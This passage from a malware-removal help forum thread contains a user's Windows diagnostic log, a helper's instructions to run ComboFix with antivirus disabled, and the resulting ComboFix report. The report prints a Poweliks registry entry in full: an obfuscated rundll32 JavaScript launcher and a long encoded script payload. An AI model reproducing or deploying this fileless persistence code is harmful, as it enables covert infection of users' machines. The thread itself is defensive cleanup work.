Wanarpv6
 
Error: (09/11/2014 07:02:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Microsoft Office PowerPoint 2007 (KB2596764).
 
 
Microsoft Office Sessions:
=========================
Error: (09/12/2014 09:49:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc916b401cfce2a5e91c3e8C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllfb2c76e5-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: regsvr32.exe6.1.7600.163854a5bca28ntdll.dll6.1.7600.169154ec49cafc00000290008df89168801cfce2b501bf5d6C:\windows\system32\regsvr32.exeC:\windows\SYSTEM32\ntdll.dll949944e1-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:46:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Explorer.EXE6.1.7600.167684d6878c3unknown0.0.0.000000000c0000005ffb4e0b38d001cfce1e5f8c4d59C:\windows\Explorer.EXEunknown8fe7ca2a-3a1e-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:38:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc659401cfce25c25dfa46C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll7c87949c-3a1d-11e4-8580-4cedde1b1e7f
 
Error: (09/12/2014 09:06:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc915cc01cfce1ec62e079cC:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllf70bd7ca-3a18-11e4-8580-4cedde1b1e7f
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:02:18 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/11/2014 07:01:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9176c01cfcdadc8bc3834C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll04b32946-39a3-11e4-aa00-00266c867412
 
Error: (09/11/2014 05:45:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc911c401cfcda4012484c5C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll5e6325ad-3998-11e4-aa00-00266c867412
 
Error: (09/11/2014 05:36:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc990401cfcda0ee53f9a3C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll273e42bb-3997-11e4-aa00-00266c867412
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-21 08:59:48.259
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.229
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.179
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.139
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.049
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.999
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.959
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Percentage of memory in use: 45%
Total physical RAM: 3061.86 MB
Available physical RAM: 1658.38 MB
Total Pagefile: 6122 MB
Available Pagefile: 4662.01 MB
Total Virtual: 2047.88 MB
Available Virtual: 1894.43 MB
 
==================== Drives ================================
 
Drive c: (S3A8572D009) (Fixed) (Total:583.02 GB) (Free:538.4 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: () (Removable) (Total:7.45 GB) (Free:4.98 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: 9BD1B9BA)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=583 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=17)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================

Edited by tantryl, 12 September 2014 - 02:20 AM.


#7 olgun52

  • Malware Response Team
  • 3,784 posts

Posted 12 September 2014 - 07:07 AM

Hello again tantryl,
 
Please do the following:

 

Please be sure to run our tools with administrator rights.

Next, download ComboFix. Save to the Desktop.

  • Disable all antivirus and antispyware programs. Get help here
  • Now, close all open windows
  • Double-click combofix.exe to run the program
  • Follow the prompts.
  • If the option is offered, it is in your best interest to allow the download and install of the Recovery Console when prompted.
  • When told that the RC is installed correctly, press YES to continue scanning for malware.
  • ComboFix will run. Please don't click on the window while the program is running; it may cause your system to stall.
  • CF may reboot the computer and resume running when it restarts.
  • When finished, a log, ComboFix.txt, is produced.

Please provide the contents of the ComboFix report in your reply.

 

 

Have a nice day.


Best regards
 

 


 


#8 tantryl

  • Topic Starter
  • Members
  • 31 posts

Posted 12 September 2014 - 11:35 AM

ComboFix 14-09-12.01 - hesperia 13/09/2014   0:15.1.4 - x86
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.1.1033.18.3062.2016 [GMT 8:00]
Running from: c:\users\hesperia\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Disabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\hesperia\AppData\Local\Microsoft\Windows\Temporary Internet Files\{60168C3A-F143-4AF9-A2B9-92DDE360BA34}.xps
c:\users\hesperia\AppData\Local\Microsoft\Windows\Temporary Internet Files\{9D591210-0E08-4DB3-A87C-AA40494B1F7B}.xps
c:\users\hesperia\AppData\Roaming\appdata
c:\users\hesperia\Documents\~WRL0693.tmp
c:\users\hesperia\Documents\~WRL1124.tmp
c:\users\hesperia\Documents\~WRL1241.tmp
c:\users\hesperia\Documents\~WRL1595.tmp
c:\users\hesperia\Documents\~WRL1731.tmp
c:\users\hesperia\Documents\~WRL2714.tmp
c:\users\hesperia\Documents\~WRL2828.tmp
c:\windows\system32\Thumbs.db
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script data omitted]
fxvtV5!jq#K+pWWi`9iU DIm2NW8jws#f~c\s\&1j4.tj*IeVw&?UY%jiHA1T9+#fgV89^Y|qtlKsW.n`}z":1yp:tjP.9Cij\L#sjyAB&`w2^P.WqwHIs]WK%pl\28|CTxE94~}V1ti`I#1K4(|.Vkts~q[LIh8q~&p^#9\!.;\ 6a1^5AIu^8s..C3lAtT8Lli1~l3!y8sw!j:ahp^VUnf^}8:S ]VSX..oCg!s:tqA+}8.F1o4_pfNGt!\qJqaZo$_1h1;CwVjj3wC4ZNa^.^Z[ A ]+9Z?_#F`Vnj YIj9].T2U}umXj2\n]f4x1p4Ip#958VN \!9xpjVD}F^f}1&# DVI`]9\Ltq]3w.10HfIosx.ss"P9}iPzXp+L2lisGJ.1e}ZOc.`Vq]3^E jXqH38CK e6:jt" iY!4`sKliiH}qtW#j&X}i9rKi37HqoZJ.VK:sx:jNII8Fj9e.g|t3^Dj]1g!!ljj,o}0w5+#tnlVtkjy"1tqj*4o]jHh*l}ZY*128Y4ZVNi3^ #!\r[ow/K 4Am YGto9xqN/+%[Mp+.5\2j5[iDII/1V.!w~tjsFm2w/}`6Ui3x6}3Dq^3OMpjtA`sp7]sVllA*f.u20I3h7tMxD]V"nl3BlHV.:tV}jj wxsVw\2jtPj8StTw*Is1A"MY56P3Wpj.*Nr1ql+57]V^;H!"KU^SIuVUP_Nom0c}V}X}Dj]24.\V\MHwBt\ tXe 5M10}Gp+(SHh10}j456uw?mq37+otgiZY6("V.062CVg\^VwZ8fgplZB;qfAxFT, N`1\H!H0IuV}j D5[qxI+%$g}T1~8Np"5j5!4.Nn^sjsPy~5[+"?10tM`(3ZiTtnjjV]I"#n}TV;Pj`*Hs49p OGp#};Hs9#`^.VI~t(K6}jw8h9rj#LU?/l} }WHqw*H+A8}V.~[Fz6P+9VNqsdjpw~ sNr`VI*p^Va6K1\Jy`D}VX6Ij3&12IXtfNZwm.psoq139tCC9qti`!p#4jpi97e`YVmjjYlAsji.\I]j9xHojZpZoq`x1 6!w8jjmXpssGK"oW}.\V8#wI? H:losG^2IGj&9fj^s.]F\A^xKh}T8IIZac(3WtT.wpqw#mTBjK+Vo]L4q8iw6Iis~?#tbtA}6qC\AjZ9&8.\Z}:\f]%^ejjsnj w~po9g.0fh5i#}}3sn#"p} 8vpf2gj tg[z6$5ytcl`vni!jhck4x["\qIo$Aq:Y}#j%W.N.KK3Xts.g[M99#U^91#odri.`nVF%5jjs48I~}(0hC:8l^#w?}`XW\:tWjp9"5`sOIqow.h,IejgZCf"l3]!ju9;P8bX\ywEjt;#jDri!wMt ^xpjoIU.I:t!}Mm N%%t_p#}tH3wDjs"xNqo`? 
H2}ssuqVj IjHs4&i:4WiV"D.2HD5jtZtT2MINNX4T].}!wA\!A*]3D SqL8p#9l]^s2\&4|pq6.ijg2F!w1i!1X?.[lmfN;P+6\+ Vtl+Oo5#92[!R\H3w}j+tbI3HX}.I$"2xAjqt~HCKXPZD*}VwZ.`2wd&j8}#A\I`FB|+48lhtN#MX|6pgCKUHK|+so#_AF53wfNGNweFKh MOfn3x9N0aS}MN;#os }y3-p+s~1T1x[3XxJ+KhI!oGj!15}o1KU3l5rGA:ijw|jV^9Ci^D.j3 U314#V}_jqNipiO~N+wn} w1^q^W5+[IphIjHwA/`sjI}yN0}j9H \AjVX1.jt(t?Ytn!hZIAVoIiowI ,NP&9(6oj:}uVWj%txtytt\Dk}^1Ui.^Si3\tCi9}p8oZmCV.8qs4N8}Cpfs~}oNH#OA}+O(H3oS}qw`e`}*5wnp8I;jL"} Vxc\iwxjs4L9!9o#UwtpqwrHs\8jsm8}3wsjPT mi2~}U}y[w1a(2g3lZsjjV^l].j/tTaW?8tZ\w;if92j 9oI#BIKi6U#!j xCIhHlj!Is8jV/:&x.}^92#XDIC("p}hwc.^HV"F.bCo1&H;,9.+Hn?p5Z#L~*CsTc?io&H%I;#qtGj(1\.^.2[FI\#!8rCo5*}`BMmjwUC I~INAVr awlVs"i!aC[3jj1![$NTIA jsAU.gsj mltCgK^ & }p~x? 4\929U#r,7jwVGH t7?%}N]"A6 9}1s[xNVIki^s]Ij&X}8j8ClxH!wAeT99pZ1\}(s"C99~?AsP a}l+VhCL"pPojSlqtlHVF&]`t#:Mw242N0 MXICM9Wiia6I_(&53slip1GK:sHl3a Ni}s]g\}%T mi2qpqsg[ Iojjgq.o9$ .x.}O.]qw?}ZAh:t&i FwHj./ITo mUNAij4:i#gsm+sy131Z]s."ma.jqYwjK~Z#jwCjTgspZ#*j..}}%tdKsI$iB`pV5X jg}} O:132wIi.$#Nsrdyz .`I~j.z!}.4jPhw9I_#(mVV^jPIIlj9UI#t~43o8CjAc\h4ISf#AKVoX}o1fUKwWl`s~jj^FHjwL}h0*l`25\xNGtz,ySZpT.!10l3}W}:xH#3^?.#HNHust6G9d"K^;l8waHsa1H:^C[q`!p8sA93}~jT,l}Z.9miXylft"#s~ZJ""&jp45IT9tjs1-j2lh1wA0Ps~} (9AC9A!?0#L:fs8635lj`9FI"BZ49AA#.aw[q1 }#BG+3,V}8Vo9y"6m.I~ijg?]y~SC38s|.eX53H88+s\p0.BH 48+ ,x\sjA}ixrIP}yI9t:8jtj`.A*K0F\}L~Aejw2n39K?Z]jU3V&tTV\l8}zNU[`Hss0j&a|j aM?oBNIuNxe`oX`wqKqI~}3g|tyj}jVjF}8#5`kYAH#9&10}fI OZ5#.M#j\}tig/pT(Xp#N~^_sBj3^5pj9"jFj5ikD.j+wxrAot`ft^P3s~}j.GKq]GjV17#MDZ^iwq.i44?"2SHA*O5gfp`9: M9I}:^ZtVjxwHC\&AUCs.G}Z.GIVoopq.~HyAht"~Wj3oM1fA~j2}o"!t6I0WHP."xn(9H]!xx^]|j2I\n99~.:ABmU[jI!tst ^s Vw9liomjV,t6AhXUX/?j1MF!^l#DfiiOxKVa(K.U[oAA0*BIT^XI V"\.x2i D\H 4SlV12e^Ha"KxIljNtnVgvisjx6!9}Kw]w`:hS]PNal8I.pPs7H+t0}(gs^q4fjpt~?hw}jqV.jV~1?qsV}.^qH3^383wcNw].gy58j3}wp`,91o4j.o9;^!"p6o^nl!H013s_CVo+1sjIs6X#jxS\.jr\VDj[t\!}` #s~HG9KIpsw+U1:[ygI#sxWls]NHu15twNtUj9Hy6~[1\].wjt3jn4`06` W7]sI;5yYJp+4}lTp.}x5!e%^ }h#4.V9XPZF$\:Drl0}.]2l: 
LxI8qwA.Zx:\xvnj!i\}o12ms]x?V/W#Kg3iTI634\IUN"Ps1hIj9F?8wx\jl\e3"/tVDxKq^h5jw_tu9!+As$|T#o4 ,AC!xvHojs?qsWpi*7C`*;jw?HbY}t ltjMgMiPth?^4DqLI!t+IW4j.2loey?V.~8!XtiT"X}i4;.9A&\yt]qM"k.8VAH:XF}(aYjTa;I_4l"xWS]ut;pqtK9o\KU5S]C4s \YpT4~!YVi8VH5(^:lA9a8C9C}"9}p^vKVow5xN_iU5ZpoN+1ie7+U5.e&"\}#1ci#;}T9^ GtO1Fa?lw9_CMDA\Vxftf4&pZX?j3oZtqswj`6j}sH8}r%l}."2\"4(?pHjPA~ `}m!"cpZsois9pej9Mj3x2pN3*j!IbH#qW1AIG}T2.+sHZC35D\9xA} 1SNTVxCqN]U28D;,~P2j9j&gFj"~rK_oAU(}t\u.~?.ABlo#hI9I;6M^Xii"(pf2~j9.VJyNBgFxI+_V2]kRX]&4(]Vjq.:oAgxtl} sZm`sG.fB4}+W8Pjx;HiwMr31_}TI~PjsH:Kw3l`.&n.jA}:w]+OC5s[Wm2.j\swjpsYGiBn?V.`HFgC]99p t I+o7}q5*jxwC+ N\]xjD6M1c]Vw:1w3h`KtUJTYwjo1]ro(M4397i!D\jTwK|+qw?9sm6qN5(f~&IAIq Kwy}VgKj 9V+qH/`:F\HhWll`s413^ZK ,;\!jjC!j?TX;.#tN#`Ft"FxIr:IA#s^fjx1D\qx5?^os5jsI]+*lp:Nz?#H0}i97Pja/i 9}.h[x?p}_t.t gCgjj8NtCM8Zi:Os iaZp^o&j.wmHV*VIVw#H"4j5 YG\2I!#TjZmo40IsjX88V4mf^w|y*~F TXj2gI8VlA?:sI5!w7jp}Wjj}*mo44l!6Dj.9|[VwC}%#h?iF;FZtAt.4M s;jyj28ywpju&F`HZmZY$[hN;Iwt.KsHqr3wyiV16\3^\?it ji.x}`V-5?Oy}8AZ^!xI^2"v}U9IKZBn5Kpl}i6;lGteSz1H}s.KeX.iqgWS+4;5P1ljqjAqV9*1V}M]C9L} Xxt!RDIw49d w_}iVwj`W*?#4n|+HHn4:iT"Aph[ZpTFg[Z1\`Kj.1A}jj2^x\(4SP94C+AH9ILI`}T9$SZ}hp+ax4%Id}(9E[TA\}f$5}fA"]N5T:jjhI21.ia:^V9Mi!T*IjHA:yqW]PN~p`I5mT[~S+NH}.~Z\P\2j3oK}sws]Z2.j(9S1AjS MafPj".]ugCH^eXU.m7^"bW?AVCI9}S.oIM}&9fH3^f1#t~4!Y+6qt%s"S5ZNG}.^xnC9:iT"r?ws?5LVkjssG4w}+pht2.TY5]381n \2jUHxr#V:C:1et34Mpjt ]!gM]MR\FzR6|.sA:2s+ 3Y^Nys3pio$r!N;H?Dy#hlZpU4spis7\ot\13g}NA*A]C\H[3Zh}iwVHVGh:!92} }w.G}fruHaHq.l}.j28U^&pf]V Y_[ZmA:sxwlVwZ#4qt lA#Ug1lA4A(3NV}h6jKZs!m3a~KV,~[ aZH3XqroeSI+ww}jVet:"tKA}~j!j!}L\f\VDjKs[/(N"PhNdmA}.?!H"%.&^f4knh"..p3WNTs j^sa:fx?Ios$#.99i.w\i"H1011m!wx[+mW.yYAl+[4?i}wj3\Wi wsjiHMjih7]s}j9299jqYUF 0 jjjM]p9\?jHp\!N~} /X?q6HpiBk.r,;}V~I}VwApsoauNMPAVdt2as?0sAPj56 f~qt!8Cjj$6UFsae NVm`s+roe.?h9Sj!^pFTaWIu[$j#t}]V*f\2aA+o9~]3w982x2} aDHZ^hmFV }pt:KAsBNp4wpqwti.wn[+^Z+ H$NV9 8oNf`j"91sNn8jAXt!g*8"9x?0#|5(tX]iWZj8VU.h[km+tw8&\Mth9L1osH}Vw5[_V%`!wsI`Y_^L^fe!`hizk\r:oMI3V`[#}apo} 1f[aH!1_#?D.} 
wn+hawpUN~H.VH`.IXl`2.if"t\s"Ii k\ps[D53cM]+1mlV6VI3s:KiYh}:jW6 jxHo]0IT}$}qm.:s"IlwNUCj"ACDI]#xx}jo}U39KC+NoN8N91qo}5fWW f4|#3wppq$j}Tww}q1an!ADp0NU[ xZnCjk}TwAp^H3"&N~iqmXlwWz.V10I N~ V9MCqa5?io\os~eN9.5.9E}wAN]Fj9e:D!8!j5Ny4M\.V_i#Ab.Z9+pha}|+1D}jgV 9jDhX;lo}A}`tF(s^5js6"#!lyjjwZts92:HrM9D]hFjI8pap%tUIV2HPL4Lei^s.ULWlq}"HjwttL^60sqCVaMnC9h8haZp`t.":1D8uw^.0cA5T4jKhsoHj9k\Va!5T[wI sI6o.t" g25ZNgP tX}x~Lj38s}04|:1K#+*^4AF9HoBIHVF~ej9!nh"CmTob.q.;e^t6(M"Ap`sD]j^|jj4A\ia:K:o9gjFa] N;NZsjpp[~jVs2}jwAi#wAp#o"piF"}`1o5jj2p`t~jjwH}F\1]ogs+w4Ij39n839xjjsB4To"jUNWC28l}hx5pP]`l+YMtyN$\!wZ.0N;H2xY82Ol]qah.A[?(2ID]V*m.895jstb}T9Wts1*\oaKU[\}390}q*oU!"1q*Mt.g.Hjw?iqxZ.`[D9.9_#UV\?GI!V[}+#sIPxxl]qjK34K}+w"H8s/`FjAlAIj8sAhC2\|#hX&0#mjF+#s9mw5.5s["?h1onC~l8%~AIqok43s;ty1t" 4*4AI4]F\;}j9!#!"(H`X}q292iVNjj0V]pio7pq.~#j\nj3"??V#`IpN~}qY-55!.j9G]:gA}jgx VwM.^]?`(t:isj8.Z}ip+4xI#}8}ll^!gYrp#b5V.~iq,i(.t&p`N~}jx(}(xZ#PjfIVa:.1ji!s`p0}$1iqw.qwVnMXc\U"Zp##G.iN5#sN6mMgY4Vt\8(9!}?OsiixCrqO3j&tkt#t}.ww]l9$q.".78.w3^qa(ji4U!t$ ^t$12\E}8s}]jg:}L^|nPw5.^BZ}ssoeiIA.Z9U?q4;}"V. V9[TwAKs#m3wZejmftjwS+V6A\Vx!i."DiVDIp0]2`twt39jjq6.h*lpq3.\.^1}p9M5%Bn?qwoPsYrUs9fpqYqtsa(# OZ hgY4q2j!9} i1GAq+pi#V.9."8FgD]3\..%}S?#9xiq1#5:gp}2A~[KxfnV"/C"~Zps[`F3.PV9N4^.Bj#4;KTs&]V4|iiw(}T[Vji9Ae0mXVa.l0sGi!O}[FxI\s&65yOZjo.jUIN?8wPjs4q}+9N]sj\ s\C4!24H3*y].1 9"2Iw9An2jD](45n3wFl`Xl"..2jqsKl.9].VBUIh9w}Vw: sx?hamr Yw#sFo"Mxq.s6U M45P!\q]P"xNN$Zm!t~CpV}4V93+VB;43Fo V9r\pgIK%#5j%An]j}H5w(j^I0#!aZts4IJ+wCrjs.`x9_no1M}HYj?TX& Iq]Z*^sa(1iX!lhF5e01B5!wfp`sV#y^y Vg/}qw&4_tKjy.SP#9ZmV.alTOKKqVm^F^WjugCpf];IoNt}`}$U^vp`pW}&\*}j^ t 0h}8oS}CpS}i1hKw.$NT}W}qbM}jg }ik*?iAS?fw;}`,BUf~nl_3lt&\I}jw i+"A}Z}XmYttT}xjsB1T0Zji.~t!w#o^f1 [wj3s"}`N]`jwAIA. 
]sjA8!wZeT&\Kw[9(&N"tTIKKsIp.#oaH+mW81h} xH%]}IiVWHwA-".zDlVqX}3tX}Vwf} x p`BA:2s~HT.A4smT1V4;}9sV]sw|\!^|I#sjK+NgtAsH5Fx._10}j9(iO26i5!HA]s:2s~ iV ?VVo5+1oIVs #3\Z#P42|TXZ} Ny\`,Ajj2HApM]VaMjj^y}PxSNZO&:2s~Ci.\jU%"9BnIisIn:91C#^s}h[mKoN^]`9\`^FjyYm}j\I#K&htfwvKAo&U(t~}TtIHN5X}h02?#sn}.ID}UTD1+#&ji1b]Vw!gL9?IU,.}xw(jM93^!j&p:)D13.Ajh.XlwVU13\7+#t8]3aA^TwpI/1n}T}N}Zs/I!wf1AFN}xAj:92[Txwp`[s:.V;efA l.t$ [l}Ts~}.~.\!4..3tw. IV]ZsF`j8x5Z. t!x9#3\?iiXvI`oHm3s}}+YKNsH"jVohl+w"8!"2\9jFhqIK!Y"H2s$"28h5Ns iF&ht!&!]P~s?8tZt.D}PIn4y*UpUH4.T*SPC0*H3XIl9H0H+1Z^jq*9M"5?j.b]F\FC1*}VxE+Aql`t8 %1U48t]p%oAjpA$]sI!^9~HI [q4sVD}2N!1jxx?^sKt gA\2"l8Vl&qs?g:1;jis;?sHa}utw4hHHP3w}jixkI!TS+39.[yw#:!wMpj1"F xfjj"AeVlCjst1:.sktis`?A.fph2bH%.De.9L}iwCpUHN}+9~jNsT\jXMH_1AijwAP:aKHVI6p`HIU:1 }i*;Iw}2s[0Sqwq]L^A\%T6.psmHVw!tAI/5V~?lZIn8j\h 356ji8fp^[/}sw_iU.mIZs3I3Ba.o9ye&4K}ithHoo4?os~tAt$g3X*rV6NnK4AeFwZnh&XN$3t3.~e+Fq583z+!4NHTF V41eT8|}3[Wms.&eZI6jM"AK8Ijnsws\2\|]!X2jw]ImjFwji}5.`V2j O;KVFGC!a1Ch"|Kp2 H3FM]`wjjsxrjAo8 jjA .AF^+tX. s2`jNmP W.NZqAIio"lhm8Pj"|}TlfH3ogI!6AijHAts^Y?`s}CKwfPxaW]iX.I`on".3XPqI~HZ,#I HhI#2XiM"A}T^LI#on!.~PqtK`ja/}01} :tyiLg og1I8tKg2soeV,;jZw-5+XIpiqW^81}V8v?%4&K 9t}`Nt9saAH_w5#Va1t!l|8!4s?`BSjLASi3*V?AFU5s]UmowVH&4s]U9:%(lNqw7jZso5gY. 
Ab83WhtFgx}qjA5`oZ9!II^3,x4_tf?Us$jpAw#.x5iV"XKo}S1q}A6wso2wA.81t}j"5}3DCt"^/.^HWjqZ]VIoAs$I9H0l!14t!\t8p9&?oo..3V~J.q.(MOnj.t;^Fj:}jxZiiw/1ooA5FwS}s925Zs/ps$opUV"[.9M8Tj&I/02S"t56wb-nXO&I;%2JXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO JXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXR\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JzO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rR\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\SH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH0\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7Jfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SH,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb%-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz07Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02Sz%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7J&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO 